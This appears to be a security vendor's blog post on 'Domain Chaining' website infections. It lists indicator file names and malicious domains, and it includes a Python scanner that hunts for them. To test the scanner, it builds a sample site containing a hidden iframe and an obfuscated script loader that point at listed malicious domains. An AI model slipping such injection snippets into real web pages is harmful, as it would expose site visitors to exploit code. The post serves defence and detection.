Malicious hackers are constantly changing tactics in order to evade detection. One of the relatively new mechanisms used to infect thousands of websites on the Internet is known as Domain Chaining.
Domain Chaining is the use of multiple malware-infected domains to form a network that distributes exploit code to legitimate websites that have been compromised. This lets attackers reliably push exploit code to thousands of compromised websites, infecting the sites themselves and, in turn, their visitors.
What is a Domain Chaining attack?
Domain Chaining attacks have been on the rise since the beginning of this year.
The basic concept is as follows:
Why do malicious hackers use this approach?
There are a few benefits to using this mechanism. The first is that signature-based and honeypot-based detection systems have a hard time homing in on the actual source of the malware; they tend to identify only the distribution points. Another “benefit” is what can be called “failover.”
We have blogged about hackers’ understanding of the necessity of failover in the past. If a security organization identifies one website in the chain as dangerous and manages to get it shut down, the remaining distribution points keep serving the exploit to website visitors. Think of it like a multi-headed Hydra: cutting off one head does not stop it.
How do I know if my site is infected?
If your website is part of this Domain Chaining attack, it will most likely contain one of the following files. A file with one of these names is an indicator, not proof, so inspect its contents rather than relying on the name alone:
script.php, cssminibar.js, sidename.js, jtoolsmini.js, tempjs.js, js.php, jstools.js
What do these files do?
These scripts load code from infected websites harboring malicious iframes. The malicious iframes in turn load exploit code from maliciously registered sites.
Maliciously registered sites related to this attack:
Maliciously registered sites related to previous Domain Chaining attacks:
klubnika34his.com, bogdantevye.ru, jwjmusic.cx.cc, frankieeus.ru, gaufridboris.ru, stephanos.ru
The malicious website content is primarily distributed by a file named “wpqonfig.php” that redirects iframes and scripts to a maliciously registered website. Note the spelling: it closely resembles WordPress’s legitimate wp-config.php, so take care not to confuse the two when cleaning up a site.
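As an added example (not StopTheHacker’s tooling and not code from the original post), the following Python script scans a web root for the indicators quoted above: the listed file names, including wpqonfig.php, references to the listed maliciously registered domains, and hidden or zero-sized iframes of the kind used to pull in exploit code. The sample site it builds and scans is constructed for the demonstration; the domain list is the one from the post and should be extended with whatever the current attack uses.

```python
import re
import tempfile
from pathlib import Path

# Indicator file names quoted in the post (wpqonfig.php is the distributor file).
INDICATOR_FILENAMES = {
    "script.php", "cssminibar.js", "sidename.js", "jtoolsmini.js",
    "tempjs.js", "js.php", "jstools.js", "wpqonfig.php",
}

# Maliciously registered domains listed in the post for the earlier campaigns.
KNOWN_BAD_DOMAINS = {
    "klubnika34his.com", "bogdantevye.ru", "jwjmusic.cx.cc",
    "frankieeus.ru", "gaufridboris.ru", "stephanos.ru",
}

SCAN_SUFFIXES = {".php", ".js", ".html", ".htm"}

# Host part of any absolute or protocol-relative URL ("http://h/", "//h/").
URL_HOST_RE = re.compile(r"(?:https?:)?//([A-Za-z0-9.-]+)")
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# Zero-size or hidden frames, the usual shape of an injected exploit loader.
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*[:=]\s*["']?\s*0(?:px)?(?=["'\s/>;])"""
    r"""|display\s*:\s*none|visibility\s*:\s*hidden""",
    re.IGNORECASE,
)


def domain_matches(host, bad_domains=KNOWN_BAD_DOMAINS):
    """True if host is one of the known-bad domains or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in bad_domains)


def scan_content(text):
    """Return (kind, detail) findings for one file's content."""
    findings = []
    for m in IFRAME_RE.finditer(text):
        if HIDDEN_RE.search(m.group(0)):
            findings.append(("hidden_iframe", m.group(0)))
    for host in sorted({h.lower() for h in URL_HOST_RE.findall(text)}):
        if domain_matches(host):
            findings.append(("reference_known_bad_domain", host))
    return findings


def scan_webroot(root):
    """Walk a web root; return (relative_path, kind, detail) tuples."""
    root = Path(root)
    report = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.name.lower() in INDICATOR_FILENAMES:
            report.append((rel, "indicator_filename", path.name))
        if path.suffix.lower() in SCAN_SUFFIXES:
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue
            for kind, detail in scan_content(text):
                report.append((rel, kind, detail))
    return report


def build_sample_site(root):
    """Write a constructed sample web root; the 'infected' content is made up."""
    root = Path(root)
    (root / "js").mkdir(parents=True, exist_ok=True)
    # Injected zero-size iframe pointing at a listed domain.
    (root / "index.php").write_text(
        "<?php include 'header.php'; ?>\n"
        '<iframe src="http://klubnika34his.com/in.php" width="0" height="0"></iframe>\n'
    )
    # Indicator file name plus an obfuscated script loader for a listed domain.
    (root / "js" / "jstools.js").write_text(
        "document.write('<scr'+'ipt src=\"//frankieeus.ru/x.js\"></scr'+'ipt>');\n"
    )
    # Legitimate wp-config.php: must not be flagged (wpqonfig.php would be).
    (root / "wp-config.php").write_text("<?php define('DB_HOST', 'localhost');\n")
    # Benign, visible iframe to a third party: must not be flagged.
    (root / "about.html").write_text(
        '<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>\n'
    )


def demo():
    """Build the constructed sample site in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(tmp)
        return scan_webroot(tmp)


if __name__ == "__main__":
    for rel, kind, detail in demo():
        print(f"{rel}: {kind}: {detail}")
```

Run it against a copy of the web root, not the live site, and treat every hit as something to read by hand: a hidden iframe is common in injected code but also appears in some legitimate tracking snippets, and the domain list only covers the campaigns named here.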
What script is used in the current attacks?
The latest version of this Domain Chaining attack uses the following script:
How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up to date on the latest ways that infections spread to legitimate websites. At a minimum, check your web root for the file names listed above, look for iframes and script tags that reference domains you do not control, and remove any references to the maliciously registered domains listed above.
StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.
Till next time…